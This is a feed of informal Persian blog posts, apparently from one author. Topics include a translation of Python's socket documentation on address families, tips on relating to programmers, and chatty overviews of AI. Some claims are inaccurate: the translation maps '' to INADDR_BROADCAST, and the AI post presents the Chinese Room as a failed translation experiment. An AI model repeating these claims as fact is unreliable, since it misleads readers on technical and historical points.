نوشته های localho3t

سوکت نویسی با پایتون - بخش اول (انواع خانواده سوکت)

localho3t — Sun, 16 Apr 2023 22:30:20 +0330

سلام دوستان امیدوارم حالتون خوب باشه.امروز اومدم که تمام داکیومنت سوکت پروگرمینگ پایتون رو براتون ترجمه کنم.برو که بریم ........منبع : https://docs.python.org/3/library/socket.html این ماژول در پایتون دسترسی به رابط سوکت BSD را فراهم میکند و در تمامی پلتفرم ها مورد استفاده قرار میگیرد.توجه ! برخی از رفتار ها ممکن است وابسته به پلتفرم نباشد ، برای اینکه در ارتباطات ممکنه یک سری از API های سیستمی صدا زده بشه.پایتون یک سیستم فراخوانی یونیکسی هست که به صورت شئ گرا برای کتابخونه سوکت نویسی پایتون استفاده می شود . تابع socket یک شئ سوکت بر میگرداند که به روش های مختلف قابل پیاده سازی می باشد و پارامتر های بیشتری و سطح بالاتری نسبت به زبان c دارد . مثل عملیات read و write در فایل های پایتون و یا تخصیص بافر پدر عملیات های خودکار و حتی دریافت طول بافر برای ارسال های ضمنی.خانواده های سوکتبسته به سیستم و نوع ساخت باید گفت تمامی خانواده های سوکت توسط این ماژول پشتیبانی میشود.شئ‌ سوکت نیازمند قالب های خاصی برای اتصال می باشد که در زمان ساخت سوکت باید آن را اجرا کرد. که تمامی قالب های ادرس را در زیر لیست میکنیم:خانواده AF_UNIXاین سوکت متصل به یک گره به صورت رشته ای با استفاده از رمزنگاری فایل و یا کنترل کننده خطای srogateescape نمایش داده میشود و یک ادرس در فضای لینوکس به عنوان یک شئ بایت مانند اما خالی بازگردانده میشود . به یاد داشته باشید که سوکت ها در این فضا میتوانند با سوکت های معمولی ارتباط برقرار کنند اما ممکن است نیازمند هر دو ادرس می باشد.خانواده AF_INETدر این خانواده یک جفت ( ایپی و پورت ) استفاده میشود که ممکن است ادرس اینترنتی یا ip های ورژن۴ باشد و پورت هم یک عدد صحیح .در ادرس های ipv4 دو فرم خاص قالب استفاده است که یکی از نشان دهنده INADDR_ANY که برای اتصال به همه کانکشن ها مورد استفاده است و دیگری یک رشته '' که نشان دهنده INADDR_BROADCAST می باشد اما در نظر داشته باشید این رفتار با ایپی های ورژن ۶ سازگار نیست و اگه میخواین از این حالت استفاده کنید نمیتوانید از ipv6 استفاده کنید.خانواده AF_INET6در این خانواده باید برای اتصال از چهار پارامتر استفاده کرد (ip، port، flowinfo، scope_id) .که flowinfo و scope_id اعضای sin6_flowinfo و sin6_scope_id را در ساختار sockaddr_in6 در C است.میتوان دو مورد flowinfo، scope_id را حذف کرد اما با حذف scope_id در زمان دستکاری ip ممکن است مشکلاتی پیش آید.خانواده AF_NETLINKدر این خانواده سوکت ها به صورت (pid, groups) نشان داده میشوند.خانواده AF_TIPC پشتیبانی TIPC فقط برای لینوکس با استفاده از AF_TIPC قابل استفاده است. TIPC یک پروتکب شبکه ای متن باز و غیر مبتنی بر ip هست که برای استفاده در محیط های خوشه ای طراحی شده است.آدرس ها با یک تاپل نمایش داده میشوند که فیلد های آن به نوع آدرس بستگی دارد . اما شکل کلی تاپل به صورت (addr_type، v1، v2، v3 [، scope]) است که در آن :گزینه addr_type یکی از TIPC_ADDR_NAMESEQ، TIPC_ADDR_NAME، یا TIPC_ADDR_ID است.دامنه یکی از TIPC_ZONE_SCOPE، TIPC_CLUSTER_SCOPE، و TIPC_NODE_SCOPE است.اگر addr_type حالت TIPC_ADDR_NAME است، نوع سرور v1، شناسه پورت v2 و v3 باید 0 باشد.اگر addr_type حالت TIPC_ADDR_NAMESEQ باشد، v1 نوع سرور، v2 شماره پورت پایین و v3 شماره پورت بالایی است.اگر addr_type حالت TIPC_ADDR_ID باشد، v1 گره، v2 مرجع است و v3 باید روی 0 تنظیم شود.خانواده AF_CANدر این خانواده برای اتصال از یک تاپل استفاده میشود که رابط آن یک شبکه است مانند can0 نشان داده میشود. که برای دریافت بسته میتوان از تمامی رابطه های این شبکه استفاده کرد.پروتکل CAN_ISOTP :‌یک تاپل (interface, rx_addr, tx_addr) نیاز دارد که در آن هر دو پارامتر اضافی یک عدد صحیح طولانی بدون علامت هستند که نشان دهنده یک شناسه CAN (استاندارد یا توسعه یافته) هست.پروتکل CAN_J1939 : یک تاپل (interface, name, pgn, addr) نیاز دارد که در آن پارامترهای اضافی عبارتند از عدد صحیح بدون علامت 64 بیتی که نام ECU را نشان می دهد، یک عدد صحیح بدون علامت 32 بیتی نشان دهنده شماره گروه پارامتر (PGN) و یک عدد صحیح 8 بیتی نشان دهنده آدرس.خانواده PF_SYSTEMیک رشته یا یک تاپل (id، واحد) برای پروتکل SYSPROTO_CONTROL از خانواده PF_SYSTEM استفاده می شود. رشته نام یک کنترل هسته با استفاده از شناسه اختصاص داده شده به صورت پویا است. اگر شناسه و شماره واحد کنترل هسته مشخص باشد یا از شناسه ثبت شده استفاده شده باشد، می توان از تاپل استفاده کرد. خانواده AF_BLUETOOTHاین خانواده از پروتکل ها و فرمت های آدرس زیر پشتیبانی می کند:حالت BTPROTO_L2CAP (bdaddr، psm) را می پذیرد که در آن bdaddr آدرس بلوتوث به عنوان رشته و psm یک عدد صحیح است.حالت BTPROTO_RFCOMM (bdaddr، کانال) را می پذیرد که در آن bdaddr آدرس بلوتوث به عنوان رشته و کانال یک عدد صحیح است.حالت BTPROTO_HCI (device_id،) را می‌پذیرد که در آن device_id یک عدد صحیح یا یک رشته با آدرس بلوتوث رابط است. (این به سیستم عامل شما بستگی دارد؛ NetBSD و DragonFlyBSD انتظار یک آدرس بلوتوث دارند در حالی که بقیه موارد انتظار یک عدد صحیح را دارند.)حالت BTPROTO_SCO bdaddr را می‌پذیرد که در آن bdaddr یک شیء بایتی است که آدرس بلوتوث را در قالب رشته‌ای دارد. (مثلا b'12:23:34:45:56:67') این پروتکل تحت FreeBSD پشتیبانی نمی شود.خانواده AF_ALGیک رابط مبتنی بر سوکت لینوکس برای رمزنگاری هسته است. یک سوکت الگوریتم با دو تا چهار عنصر (نوع، نام [، feat [، ماسک]]) پیکربندی شده است، که در آن:نوع، نوع الگوریتم به عنوان رشته است، به عنوان مثال. aead، hash، skcipher یا rng.و name نام الگوریتم و حالت عملیات به عنوان رشته است، به عنوان مثال. sha256، hmac(sha256)، cbc(aes) یا drbg_nopr_ctr_aes256.و feat و mask اعداد صحیح 32 بیتی بدون علامت هستند.خانواده AF_VSOCKامکان ارتباط بین ماشین های مجازی و میزبان آنها را فراهم می کند. سوکت ها به صورت یک تاپل (CID، پورت) نشان داده می شوند که شناسه متنی یا CID و پورت اعداد صحیح هستند.خانواده AF_PACKETیک رابط سطح پایین به طور مستقیم به دستگاه های شبکه است. بسته‌ها با تاپل (ifname، proto[، pkttype[، hatype[، addr]]] نشان داده می‌شوند که:حالت ifname - رشته ای که نام دستگاه را مشخص می کند.حالت proto - یک عدد صحیح به ترتیب شبکه بایت که شماره پروتکل اترنت را مشخص می کند.حالت pkttype - عدد صحیح اختیاری که نوع بسته را مشخص می کند:حالت PACKET_HOST (پیش‌فرض) - بسته خطاب به میزبان محلی.حالت PACKET_BROADCAST - بسته پخش لایه فیزیکی.حالت PACKET_MULTICAST - بسته به آدرس چندپخشی لایه فیزیکی ارسال می شود.حالت PACKET_OTHERHOST - بسته به میزبان دیگری که توسط یک درایور دستگاه در حالت غیرقانونی دستگیر شده است.حالت PACKET_OUTGOING - بسته ای که از میزبان محلی نشات می گیرد و به سوکت بسته باز می گردد.حالت hatype - عدد صحیح اختیاری که نوع آدرس سخت افزار ARP را مشخص می کند.حالت addr - شی بایت مانند اختیاری که آدرس فیزیکی سخت افزار را مشخص می کند، که تفسیر آن به دستگاه بستگی دارد.خانواده AF_QIPCRTRیک رابط مبتنی بر سوکت لینوکس برای برقراری ارتباط با سرویس‌هایی است که روی پردازنده‌های مشترک در پلتفرم‌های Qualcomm اجرا می‌شوند. خانواده آدرس به صورت یک تاپل (گره، پورت) نشان داده می شود که در آن گره و پورت اعداد صحیح غیر منفی هستند.خانواده IPPROTO_UDPLITEگونه‌ای از UDP است که به شما امکان می‌دهد مشخص کنید چه بخشی از یک بسته با چک‌سوم پوشانده شده است. دو گزینه سوکت اضافه می کند که می توانید آنها را تغییر دهید. self.setsockopt (IPPROTO_UDPLITE، UDPLITE_SEND_CSCOV، طول) بخشی از بسته‌های خروجی را تغییر می‌دهد که توسط جمع کنترلی پوشش داده می‌شوند و self.setsockopt (IPPROTO_UDPLITE، UDPLITE_RECV_CSCOV، طول) بسته‌هایی را که اطلاعات بسیار کمی را پوشش می‌دهند، فیلتر می‌کند. در هر دو مورد طول باید در محدوده (8، 2**16، 8) باشد.چنین سوکتی باید با سوکت (AF_INET، SOCK_DGRAM، IPPROTO_UDPLITE) برای IPv4 یا سوکت (AF_INET6، SOCK_DGRAM، IPPROTO_UDPLITE) برای IPv6 ساخته شود.اگر از نام میزبان در قسمت میزبان آدرس سوکت IPv4/v6 استفاده می‌کنید، برنامه ممکن است رفتار غیر قطعی نشان دهد، زیرا پایتون از اولین آدرس بازگشتی از وضوح DNS استفاده می‌کند. بسته به نتایج حاصل از وضوح DNS و/یا پیکربندی میزبان، آدرس سوکت به صورت متفاوتی به آدرس IPv4/v6 واقعی تبدیل می‌شود. برای رفتار قطعی از یک آدرس عددی در بخش میزبان استفاده کنید.همه خطاها استثناهایی را ایجاد می کنند. استثناهای عادی برای انواع آرگومان نامعتبر و شرایط خارج از حافظه را می توان مطرح کرد. خطاهای مربوط به معنای سوکت یا آدرس باعث افزایش OSError یا یکی از زیر کلاس های آن می شود.حالت غیر مسدود از طریق setblocking پشتیبانی می شود. تعمیم این بر اساس زمان‌بندی از طریق ()settimeout پشتیبانی می‌شود.

چگونه با برنامه نویس ها برخورد کنیم - قسمت اول

localho3t — Fri, 24 Feb 2023 22:40:20 +0330

سلام دوست من امیدوارم حالت خوب باشه .پست امروز من نه تو مبحث برنامه نویسیه و نه تو مبحث امنیت اطلاعات و ... امروز میخوام درمورد طرز برخورد با ما برنامه نویس ها صحبت کنیم.اصل اولچگونه باید سر صحبت را با یک برنامه نویس باز کنیم ؟بزارین با یک خاطره شروع کنم :ما توی تیممون یه فرد جدید آوردیم تا کار های تست و پردازش اطلاعات ما رو انجام بده. کارش خیلی خوب بود و خیلی راحت تونست توی اولین جلسه باگ های حیاتی و مهم سیستم ساخته شده رو پیدا کنه ولی خب یه مشکل اساسی داشت.اون مشکل این بود که توی جلسه اول نتونست با بچه های تیممون ارتباط درستی برقرار کنه و بچه ها هم تا اخرین روزی که با ما همکاری میکرد به حرفاش زیاد اعتماد نمیکردن.توی اولین روز کاری خودش خیلی راحت و بدون جلب اعتماد اولیه شروع کرد به صحبت کردن و در مورد کاربرد های خودش تو بقیه شرکت ها حرف زدش و حرف زد و حرف زد.اون روز خیلی خوب پیش رفت و تا اخرین تایمی که بود هیچکس بهش هیچ بی احترامی نکرد اما چرا بچه ها به حرفش زیاد گوش نمیکردن ؟برنامه نویس ها یک سپر دفاعی دارن به اسم اعتماد اولیه . این سپر به حدی قویه که تو یک لحظه میتونه یک فرد رو از چشم یک برنامه نویس بندازه و یا بر عکس اون رو یک فرد با درجات پایین تر مورد تایید قرار بده.این دوست ما نتونست اعتماد اولیه برنامه نویس های تیم رو بدست بیاره و متاسفانه بچه ها معاشرت با ایشون رو وقت تلف کردن تلقی می کردن.پس اولین موضوع اینه که باید اعتماد اولیه یک برنامه نویس رو بدست بیاریم اما چجووری ؟بر خلاف ادعا برنامه نویس ها زندگی هر برنامه نویس مثل یک نخ به دور کد ها و الگوریتم ها پیچیده شده و هر برنامه نویسی طبق رفتار وسبک کد زدن خودش با بقیه رفتار میکنه.برای نزدیک شدن به یک برنامه نویس باید به این الگو اون حمله کرد یعنی در بر خورد اولیه با اون در مورد کد ها و نوع نگارش و تکنولوژی نباید حرف زد بلکه باید درمورد خلاء هایی که کد در زندگی یک برنامه نویس به وجود آورده صحبت کرد و نظرشونو در رابطه با این خلاء ها پرسید ولی یادتون باشه نه در حدی که فکر کنن دارین به حریم شخصیشون نزدیک میشین.راه دوم برای نزدیک شدن اینه که اون ها رو با هنر های خلاقانه آشنا کنین . کمتر برنامه نویسی میشناسم که عاشق یک نقاشی نباشه. این راه حدودا ۸۰ درصد مواقع جواب میده مخصوصا در مورد برنامه نویس های سمت سرور که واقعا کمبود گرافیک و هنر های خلاقانه در زندگیشون موج میزنه.و راه سوم ایجاد یک محیط ایزوله شده و قابل اطمینان برای آنها . عموما برنامه نویس ها خیلی روی زندگی شخصیشون حساسن انقدری که خیلی وقتا خیلی چیز ها رو پنهون میکنن تا از میحط ایزوله شده خودشون محافظت کنن و این شمایین که تصمیم میگیرین چجوری برنامه بچینین تا این محیط رو برای اون اماده کنین.و راه اخر اینه که تا میتونین از اون با بحث هایی سر مذاهب یا سیاست نکنید. برنامه نویس ها عموما انسان های تجربه گرایی هستن و خیلی سخت چیز هایی که با علم هنوز ثابت نشده رو قبول میکنن.یه جورایی خط قرمز هر برنامه نویسیه البته برنامه نویس هایی پیدا میشن که برعکس عمل کنند و دین و مذهب رو وارد کد کرده باشن و حتی اسم متغیر ها رو هم اسم امام ها و ... بزارن.یه نصیحت : از این دسته اخری فرار کنینو در انتها ممنون که تا آخر این مقاله رو خوندین و بخش دومش رو به زودی آماده میکنم.شاد و پیروز باشید#localho3t https://virgool.io/@localho3t/%D8%A8%D8%A7%DA%AF-%D9%85%DB%8C%DA%A9%D8%B1%D9%88-%D9%81%D8%B1%DB%8C%D9%85%D9%88%D8%B1%DA%A9-flask-oufldp5ez1s1 https://virgool.io/@localho3t/%D8%AC%D8%A7%DB%8C%DA%AF%D8%A7%D9%87-%D8%B2%D8%A8%D8%A7%D9%86-c-aloq4yfcxhav https://virgool.io/@localho3t/%DA%AF%D8%B1%D9%81%D8%AA%D9%86-%D8%AF%D8%B3%D8%AA%D8%B1%D8%B3%DB%8C-%D8%A7%D8%B2-%D9%88%DB%8C%D9%86%D8%AF%D9%88%D8%B2-10-xtt4it7nqvyv https://virgool.io/@localho3t/%DA%A9%D8%A7%D8%A8%D9%84-%D9%85%D8%B3%DB%8C-%DB%8C%D8%A7-%D9%81%DB%8C%D8%A8%D8%B1-%D9%86%D9%88%D8%B1%DB%8C-yema8n4qcmlv

زبانی برای هوش مصنوعی

localho3t — Sun, 05 Dec 2021 04:11:43 +0330

سلام به دوستای گلم.حالتون چطوره ؟ امیدوارم حالتون خوب باشه .چه زبانی برای هوش مصنوعی خوبه ؟؟این یه سوال خیلی خیلی خیلی خیلی مهمیه که بتونیم بهش جواب بدیم (البته اگه بتونیم). این همه نظر منه و واقعا انتظار اینو ندارم که همتون تایید یا تکذیبش کنین.مهم ترین بخش هوش مصنوعی زبانی هستش که ما باهاش هوش مصنوعی خودمون رو طراحی میکنیم.بزاریم بنیادی تر شروع کنم....زبان چیست ؟اگه بخوام ساده بگم زبان راهی برای برقراری ارتباط با یک فرد یا یک جامعه هستش.ساده تر از این میشه اقا یچی بگی اون یکی بفهمه . به این میگن زبان.موضوع اصلی همین جاهستش.فرقی نمیکنه چطوری فقط باید بتونی با بقیه ارتباط برقرار کنه شده حتی با دود . -ــــ-خب خب خب حالا که فهمیدیم زبان چیه و به چه دردی میخوره بیایم یکم تخصصی تر پیش بریم.ما با هر زبانی میتونیم هوش مصنوعی خودمون رو پیاده سازی کنیم هر زبانی که توی ذهنتونه (البته بگم اگه مقاله منو در مورد هوش مصنوعی خونده باشین ) https://virgool.io/@localho3t/ai-qt23ccr2ggnb خوب حالا اگه نخوندین میتونین برین بخونین خیلی خوبه .اما به نظر من بهترین زبان بستگی به تکنولوژی داره که ما داریم استفاده میکنیم.مثلا نمیتونیم بیایم روی یه licheepI یه اسکریپت پایتونی یا روبی ران کنیم مگه اینکه عقلمونو از دست داده باشیم.اما به نظر من تو وضعیت نرمال بهینه ترین زبان میتونه پایتون باشه . اما چرا دارم این حرف رو میزنم؟خب ببینین فرق بین پایتون و جولیا اینه که پایتون کلی کتابخونه آماده داره اما جولیا نه.دلیل دومم اینه که شما با پایتون میتونین به هر زبانی متصل بشین و سرعت اولیه کامل تری نسبت به باقی زبان ها داره. (نا گفته نمونه که به پای c نمیرسه)دلیل سومم که خودمم خیلی روی این اصل برقرارم اینه که لنگ نمیزاره ما رو.ینی چی لنگت نمیزاره ؟‌ینی اینکه کلی داکیومنت اماده هست که میتونیم ازش استفاده کنیم و کارمونو پیش ببریم.این نیمچه مقاله رو از من بپذیرین .جلسه بعدی توی اولین قدم وحشیانمون (???) - به کسی بر نخوره برای طنز گفتم - میریم سراغ الگوریتم های مهم هوش مصنوعی و بعدش میای دونه به دونه زبانا رو بهش اضافه میکنیم.قیافه من وقتی منتظر لایک و حمایت شما هستم ?❤️ https://virgool.io/@localho3t/%D8%B4%D8%B1%D9%88%D8%B9-%D8%AF%D9%88%D8%A8%D8%A7%D8%B1%D9%87-gz9jndmfvpeu https://virgool.io/@localho3t/%DA%AF%D8%B1%D9%81%D8%AA%D9%86-%D8%AF%D8%B3%D8%AA%D8%B1%D8%B3%DB%8C-%D8%A7%D8%B2-%D9%88%DB%8C%D9%86%D8%AF%D9%88%D8%B2-10-xtt4it7nqvyv https://virgool.io/@localho3t/%D8%B2%D8%A8%D8%A7%D9%86-%D9%87%D8%A7%DB%8C-%D9%88%D8%A7%DA%AF%DB%8C%D8%B1-%D8%AF%D8%A7%D8%B1-%D9%BE%D8%A7%DB%8C%D8%AA%D9%88%D9%86-%D9%82%D8%B3%D9%85%D8%AA-%D8%A7%D9%88%D9%84-y7p7kzgqdbaf https://virgool.io/@localho3t/%D9%85%D8%A7%D9%87%DB%8C%D8%AA-%D9%85%D9%88%D8%AC%D9%88%D8%AF%DB%8C-%D8%A8%D9%87-%D9%86%D8%A7%D9%85-%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87-%D9%86%D9%88%DB%8C%D8%B3-r0rbe8h1f3v7 https://virgool.io/@localho3t/%D9%85%D8%B9%D9%84%D9%85-%D8%AE%D9%88%D8%AF-%D8%A8%D8%A7%D8%B4%DB%8C%D9%85-%DB%8C%D8%A7-%D9%85%D8%B9%D9%84%D9%85%D8%A7%D9%86-%D8%A8%D8%A7%D8%B4%D9%86%D8%AF-xakznmfy0acf

درباره هوش مصنوعی

localho3t — Wed, 01 Dec 2021 04:16:39 +0330

خب دوستای من همونطور که قول دادم قرار شد که بیام در مورد هوش مصنوعی تحقیق کنیم.بریم یه سر سمت ویکی پدیا که کلا قراره کلی بهمون چیزای قلمبه و سلومبه بگه و ما هم فقط الکی با سرمون تایید کنیم.هوش مصنوعی یا همون Artificial Intelligence که به اختصار بهش میگن AI یه جورایی میخواد بهمون بگه که یه ماشین مصنوعی قراره درست کنیم تا یه هوش مصنوعی که بهش هوش ماشینی میگن.یعنی اینکه هوشی باشه که بتونه مثل انسان خوب تفکر کنه و همچنین بتونه درست و منطقی فکر کنه و شیوه استدلالش مثل انسان باشه و پاسخ درست و مناسبی در هر شرایطی بده.منظور از این حرف اینه که نریم شمال بعد سیل بیاد و از هوش مصنوعی که درست کردیم کمک بخوایم و اون برامون چتر باز کنه.چرا این رو میگم . چون اینکه ما میایم طبق یه الگوریتمی یه کاری رو برنامه نویسی میکنیم اما براش استثنا نمیزاریم که ربات عزیز سیل اول جلیقه نجات بده چتر میخوایم چیکار.پس نقضشو پیدا کردیم باید رباتمونو بهش قابلیت یادگیری اضافه کنیم.کلا علم هوش مصنوعی خیلی عجیب غریبه چون در اون فلسفه ، زبان شناسی ، ریاضیات ، روانشناسی ، عصب شناسی ، فیزیولوژی ، تئوری کنترل ، احتمالات ، بهینه سازی ، علوم رایانه ، علوم مهندسی ، علوم زیست شناسی ، پزشکی ، علوم اجتماعی پیدا میشه . برای همینه که بیشتر مردم میترسن تا اسم هوش مصنوعی میاد.چون چیزی قرار درست بشه که بیشتر علوم ها رو بلده .حالا یکم بریم تو بخش برنامه نویسی .معمولا میشه یه هوش مصنوعی رو با زبان هایی مثل Lisp، Prolog، Java، Python و ++C پیاده سازی کرد.در اصل تو سال 1956 جان مکارتی معنای هوش مصنوعی رو دانش و مهندسی ساخت ماشین‌های هوشمند گذاشت چون معتقد بود که عامل هوشمند یعنی شناخت پیرامون و شناسایی موقعیت خودش و افزایش اون با تحلیل و بررسی .اما هوش مصنوعی از یه زمانی به بعد بخواطر اومدن الگوریتم های پیچیده فرایند تصمیم گیری رو خیلی خیلی پیچیده کرد که امروزه بیشتر تو عرصه امنیت و اطلاعات و سامانه های امنیتی قابل دیدنه.البته باید بگم پزشکای عزیزم هم وقتی دیدن یه موجود دست ساخت مهندسی خیلی بهتر از اونا میتونه توی درمان و ..... تشخیص بده به عبارتی دست به دامن هوش مصنوعی شدن و یه رشته ای به اسم تجهیزات پزشکی زدن و مهندسای ما رو خصوصی سازی کردن. :)یکی از آزمون های باحال و البته محلی برای ضد حال زن مهندسای هوش مصنوعی رو میشه آزمون تورینگ نام برد که تا حالا یعنی از سال 1950 تا الان مهندسی یا تیم مهندسی نتونست ازین ماسبقه جون سالم بدر ببره.آزمون تورینگ رو مهندس عزیزمون آلن تورینگ اختراع یا بهتر بگم ابداع کرد اینطوریه آزمونش که یکی شروع میکنه با برقراری تعامل با یه چیز ناشناخته.و نباید حتی حدس بزنه که چیزی که باهاش در تعامل بوده انسانه یا ربات.(انقدر برگ ریزون :| )کلا این آزمون برای این درست شده که بتونه یک شبیه ساز انسانی را درست انالیز کنه.دانشمندای عزیزمون که کلا نتونستن تعریف درستی از هوش مصنوعی داشته باشن.البته جای تعجبم نداره خدایی . فکر کنین خود هوش هم الان تعریف مطلق نداره چه برسه به هوش مصنوعی. راحت بگم دانشمندای بیچاره کلی وقت میزارن تا بفهمن هوش چیه و جالب اینجاست که اصلا نمیتونن حتی به این موضوع نزدیک بشن هیچ بنده خدا ها در طول مسیر ریق رحمت رو سر میکشن.اما این همه تحقیق هم که کردن بی ثمر نبود و تونستن کلا هوش رو به ۴ دسته تقسیم کنن:سامانه هایی که به طور منطقی فکر میکنن.سامانه هایی که به طور منطقی عمل میکنن.سامانه هایی که مانند انسان فکر میکنند.سامانه هایی که مانند انسان عمل میکنند.اما کلی ترین تعریفی که از هوش مصنوعی اومده تا الان اینه :هوش مصنوعی عبارت است از مطالعه این که چگونه رایانه‌ها را می‌توان وادار به کارهایی کرد که در حال حاضر انسان‌ها آن‌ها را صحیح یا بهتر انجام می‌دهند.جالبیه این جمله برام اینه که وادار کنه یعنی چی وادار کنه؟ (تو کامنتا توضیح بده فکرتو)اما میرسیم به طولانی ترین بخش این مقاله.توضیحات دانشمندای عزیزمون درباره هوش مصنوعی:هنر ایجاد ماشین‌هایی که وظایفی را انجام می‌دهند که انجام آن‌ها توسط انسان‌ها نیاز به هوش دارد (کورزویل- ۱۹۹۰)مطالعهٔ استعدادهای ذهنی از طریق مدل‌های محاسباتی (کارنیاک و مک درموت - ۱۹۸۵)مطالعهٔ اینکه چگونه رایانه‌ها را قادر به انجام اعمالی کنیم که در حال حاضر، انسان آن اعمال را بهتر انجام می‌دهد. (ریچ و نایت -۱۹۹۱) - شخصا من با این جمله موافقم.خودکارسازی فعالیت‌هایی که ما آن‌ها را به تفکر انسانی نسبت می‌دهیم. فعالیت‌هایی مثل تصمیم‌گیری، حل مسئله، یادگیری و … (بلمن -۱۹۷۸)تلاشی نو و مهیج برای اینکه رایانه‌ها را قادر به فکر کردن کنیم. ماشین‌هایی با فکر و حس تشخیص واقعی (هاگلند-۱۹۸۵) :|یک زمینهٔ تخصصی که به دنبال توضیح و شبیه‌سازی رفتار هوشمندانه به وسیلهٔ فرایندهای رایانه‌ای است. (شالکوف -۱۹۹۰)مطالعه محاسباتی که درک، استدلال و عمل کردن را توسط ماشین‌ها را ممکن می‌سازد. (وینستون - ۱۹۹۲)توانایی دست یافتن به کارایی در حد انسان در همهٔ امور شناختی توسط رایانه (آلن تورینگ – ۱۹۵۰)هوش مصنوعی دانش و مهندسی ساخت ماشین‌های هوشمند و به خصوص برنامه‌های رایانه‌ای هوشمند است. هوش مصنوعی با وظیفه مشابه استفاده از رایانه‌ها برای فهم چگونگی هوش انسان مرتبط است، اما مجبور نیست خودش را به روش‌هایی محدود کند که بیولوژیکی باشند. (جان مک‌کارتی – ۱۹۸۰)البته اینم بگم خود هوشمندی هم معناش کاملا نسبیه و حد مشخصی هم نداره مثل انسان . اما قابلیت های ضروری برای باهوش بودن : پاسخ به موقعیت‌های از قبل تعریف نشده با انعطاف بسیار بالا و بر اساس بانک دانشمعنا دادن به پیام‌های نادرست یا مبهمدرک تمایزها و شباهت‌هاتجزیه و تحلیل اطلاعات و نتیجه‌گیریتوانمندی آموختن و یادگرفتنبرقراری ارتباط دوطرفهخب خب خب....بالا ما داشتیم در مورد باهوش بودن یه چیز حرف میزدیم اما الان میخوایم در مورد انتظار هایی که از یه هوش مصنوعی باید داشته باشیم میحرفیم (این نتایج کاملا مورد تایید دانشمندان است):تولید گفتارتشخیص و درک گفتار (پردازش زبان طبیعی انسان)دستورپذیری و قابلیت انجام اعمال فیزیکی در محیط طبیعی و مجازیاستنتاج و استدلالتشخیص الگو و بازشناسی الگو برای پاسخ گویی به مسائل بر اساس دانش قبلیشمایلی گرافیکی یا فیزیکی جهت ابراز احساسات و عکس‌العمل‌های ظریفسرعت عکس‌العمل بالانوبتی هم که باشه نوبت کاربرد های هوش مصنوعی هستش.کلا هوش مصنوعی تو هر چیزی کاربرد داره حتی شاید باورتون نشه توالت فرنگی های هوشمند داریم . :|اما به گفته ویکی پدیا استفاده هوش مصنوعی در وسائل خودران ، تشخیص های پزشکی ، خلق آثار هنری ، اثبات قضیه های ریاضی ، انجام بازی های فکری ، تعیین هویت تصویر و صدا ، ذخیره انرژی ، جستوجوگر های اینترنتی (خودم یکیش رو برای سئو ساختم) ، تهیه قرارداد ها و پیش بینی آرای قضایی.جالبه بدونین کم کم هوش مصنوعی دارن جاب حقوق دان ها رو میگیرن مثل تحلیل قرارداد ها و اسناد حقوقی و پیش بینی آراء دادگاه.یه آزمایش به اسم اتاق چینی در سال 1980 توسط جان سرل ابداء شد. کلا این آمایش برای ترجمه کردن متون چینی به ربان انگیلیسی بود. دیگه شما هم میدونین دیگه زبان چینی و .......خلاصه اینکه هزارتا اینور و اونور کردن و برنامه رو بالا و پایین کردن و به این نتیجه رسیدن که آقا نه نمیشه واقعا.نه اینکه نشه ها نه . شدن میشه ولی نمیتونه مثل انسان انقدر آگاه و با شعور باشه که بتونه درست ترجمه کنه.خدایی دیگه اینو نخواین ناموسا . خود شما هم بعضی وقتا گیرپاژ میکنین سر صحبتاتون :|اما در کل مخلص تمام چینی زبون های دنیا بشم من :)اما برسیم به بحث اصلی خودمون شاخه های هوش مصنوعی : یادگیری ماشینشبکه عصبی مصنوعیبینایی ماشینسامانه های خبرهپردازش زبان طبیعیالگوریتم ژنتیکمفاهیم مرتبط با روباتیکمیدونم خسته شدین ولی واقعا این بحثا جذابن :)یه چیز جالب هم توی هوش مصنوعی هستش و اونم این هاست (اخبار جعلی، دیپ فیک و امنیت سیاسی).اما اینا چی هستن ؟؟؟؟جونم براتون بگه که دیپ فیک یعنی هوش مصنوعی طراحی کنن که بتونه چهره و صدای طرف رو شبیه سازی کنه . همینقدر ترسناک اما جذاب :))))مثل هشدار ولادیمر پوتین به امریکا => پیشنهاد میکنم ببینین حتماطبق امار گیری امریکایی ها 88 درصد اونا مخالف این تکنولوژی هستن درسته که ترسناکه اما واقعا هیجان برانگیزه. فکر کنین شما قابلیت اینو داشته باشین که یک نفر رو شبیه سازی کنین .واقعا باحاله :)))خب دوستای گلم رسیدیم به آخر این مقاله.من که خودم کلی چیز یاد گیرفتم امیدوارم شما هم کلی چیز یاد گرفته باشین.شاد و خندون باشین.دوستدار شما امیرحسین پورحسین https://virgool.io/@localho3t/%D8%B4%D8%B1%D9%88%D8%B9-%D8%AF%D9%88%D8%A8%D8%A7%D8%B1%D9%87-gz9jndmfvpeu https://www.linkedin.com/in/amirhosein-pourhosein-189a8b204/

شروع دوباره

localho3t — Wed, 01 Dec 2021 02:47:28 +0330

سلام به دوستای گلم.من توی این مدت چیزای خیلی زیادی یاد گرفتم و چون از بلاگر بودن زیاد خوشم نمیومد برای همین انتشارش ندادم.خب الان میخوایم باهم یه استارت کوچولو در مورد یه استارت آپ بزنیم. میدونم خیلی خسته کننده میاد ولی میخوام صفر تا ۱۰۰ این استارت اپ رو باهاتون درمیون بزارم و با هم فکری هم یه پروژه باحال و عالی رو انتشار بدیم.خب اون از بخش اول.برای بخش دوم باید بگم که ایده من در رابطه با هوش مصنوعیه.اینکه بتونه یه کار رو برای ما به راحتی انجام بده. شاید خیلی خنده دار برسه ولی منم فکر میکنم بشه هر کاری رو با هوش مصنوعی وقف داد.من طرفدار پروپا قرص هوش مصنوعی هستم.پس تو گام اول میریم در مورد هوش مصنوعی تحقیق میکنم.پس پست بعدی ما در مورد دنیای ai هستش. https://www.linkedin.com/in/amirhosein-pourhosein-189a8b204/https://www.instagram.com/amir.pohahttps://t.me/A6c6f63616c686f3374A

باگ میکرو فریمورک flask

localho3t — Thu, 25 Mar 2021 16:22:28 +0430

